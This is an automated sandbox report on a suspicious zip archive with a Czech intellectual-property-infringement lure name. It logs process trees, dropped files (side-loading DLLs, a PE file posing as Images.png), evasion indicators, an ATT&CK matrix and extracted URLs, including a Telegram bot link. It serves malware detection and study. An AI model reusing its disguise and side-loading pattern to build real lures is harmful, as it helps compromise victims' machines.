    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: oledlg.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
    Source: Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: SumatraPDF-no-MuPDF.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: SumatraPDF-1.5.3.0.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
    Source: Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Images.png.14.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.14.dr
    Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Images.png.14.dr
    Source: Binary string: libmupdf.pdb source: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmp
    Source: vcruntime140.dll.14.drStatic PE information: 0xC7A64295 [Sat Feb 22 01:53:25 2076 UTC]
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D61090 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,18_2_73D61090
    Source: Images.png.14.drStatic PE information: section name: _RDATA
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 13_2_019B05D0 push cs; iretd 13_2_019B05D5
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 13_2_019B05C0 push cs; iretd 13_2_019B05C5
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDFF8A0 push eax; ret 18_2_6FDFF8BE
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDFF26E push ecx; ret 18_2_6FDFF281
    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dllJump to dropped file
    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeJump to dropped file
    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dllJump to dropped file
    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.pngJump to dropped file
    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.pngJump to dropped file
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: Yara matchFile source: C:\Users\user\Downloads\68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp, type: DROPPED
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 1940000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 5310000 memory commit | memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 51C0000 memory commit | memory reserve | memory write watchJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.pngJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeAPI coverage: 4.9 %
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6880Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 13_2_014FB1D6 GetSystemInfo,13_2_014FB1D6
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D619D9 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_73D619D9
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D61090 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,18_2_73D61090
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_6FDFF8BF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6FDFF8BF
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D619D9 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_73D619D9
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_73D61F12 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_73D61F12
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exeCode function: 18_2_0049A377 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,18_2_0049A377
    Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    21
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory1
    Security Software Discovery
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion
    Security Account Manager31
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Process Injection
    NTDS14
    System Information Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Timestomp
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1649464 URL: https://tinyurl.com/yep5ph9f Startdate: 26/03/2025 Architecture: WINDOWS Score: 52 56 Yara detected ZipBomb 2->56 58 Downloads suspicious files via Chrome 2->58 8 chrome.exe 14 2->8         started        12 unarchiver.exe 3 2->12         started        14 chrome.exe 2->14         started        process3 dnsIp4 54 192.168.2.6 unknown unknown 8->54 44 Ozn.men._o_zjiat.n...tnictv._.zip (copy), Zip 8->44 dropped 46 68c8e194-372f-4d65-ab89-d63f8d42e0ea.tmp, Zip 8->46 dropped 16 unarchiver.exe 4 8->16         started        18 chrome.exe 8->18         started        21 7za.exe 1 12->21         started        file5 process6 dnsIp7 23 7za.exe 9 16->23         started        26 cmd.exe 1 16->26         started        48 142.250.176.195 GOOGLEUS United States 18->48 50 142.250.65.227 GOOGLEUS United States 18->50 52 7 other IPs or domains 18->52 28 conhost.exe 21->28         started        process8 file9 36 C:\Users\user\AppData\Local\...\version.dll, PE32 23->36 dropped 38 C:\Users\user\AppData\...\vcruntime140.dll, PE32 23->38 dropped 40 Ozn men _o_zji ten...ho_vlastnictv _.exe, PE32 23->40 dropped 42 C:\Users\user\AppData\Local\...\Images.png, PE32+ 23->42 dropped 30 conhost.exe 23->30         started        32 conhost.exe 26->32         started        34 Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe 26->34         started        process10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://tinyurl.com/yep5ph9f0%Avira URL Cloudsafe
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\?\Images.png0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe3%ReversingLabs
    C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\vcruntime140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\version.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.zeniko.ch/#SumatraPDFSimonOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
        high
        http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlTheOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
          high
          http://www.drm-x.net/http://cn.drm-x.com/LicPrepare2008.aspxLicPrepare20082013.aspx.drm-x.com/2/%s?cOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
            high
            http://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
              high
              https://t.me/MEXX6toHNBotEvidence.??d??o??c??x.14.drfalse
                high
                http://itexmac.sourceforge.net/SyncTeX.htmlJOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                  high
                  http://HDMHDMLoading...%sOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                    high
                    http://www.drm-x.com/pdfversion.htm1.5.7.0..http://www.haihaisoft.com/PDF_Reader_download.aspxopenSoOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                      high
                      http://www.flashvidz.tk/ZenonprogramOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                        high
                        http://p.yusukekamiyamane.com/YusukeOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                          high
                          http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPagOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                            high
                            http://www.haihaisoft.com/Contact.aspxOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                              high
                              http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensedOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                high
                                http://www.freetype.org/FreeTypefontOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                  high
                                  http://www.haihaisoft.com/PDF_Reader_download.aspxhttp://www.drm-x.com/pdfversion.htmMSOzn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000000.1694337809.00000000006C9000.00000002.00000001.01000000.00000007.sdmp, Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe, 00000012.00000002.1696410760.00000000006C9000.00000002.00000001.01000000.00000007.sdmpfalse
                                    high
